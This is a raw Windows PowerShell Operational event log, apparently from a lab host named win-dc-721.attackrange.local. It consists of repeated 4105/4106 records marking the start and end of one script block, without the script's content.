06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474949
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474948
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474947
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474946
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474945
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474944
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474943
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474942
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474941
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474940
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474939
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474938
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474937
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474936
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474935
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474934
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474933
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474932
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474931
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474930
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474929
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474928
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474927
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474926
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474925
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474924
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474923
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474922
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474921
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474920
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474919
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474918
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474917
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474916
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474915
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474914
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474913
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474912
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474911
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474910
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474909
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474908
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474907
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474906
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474905
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474904
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474903
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474902
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474901
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474900
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474899
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474898
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474897
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474896
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474895
Keywords=None
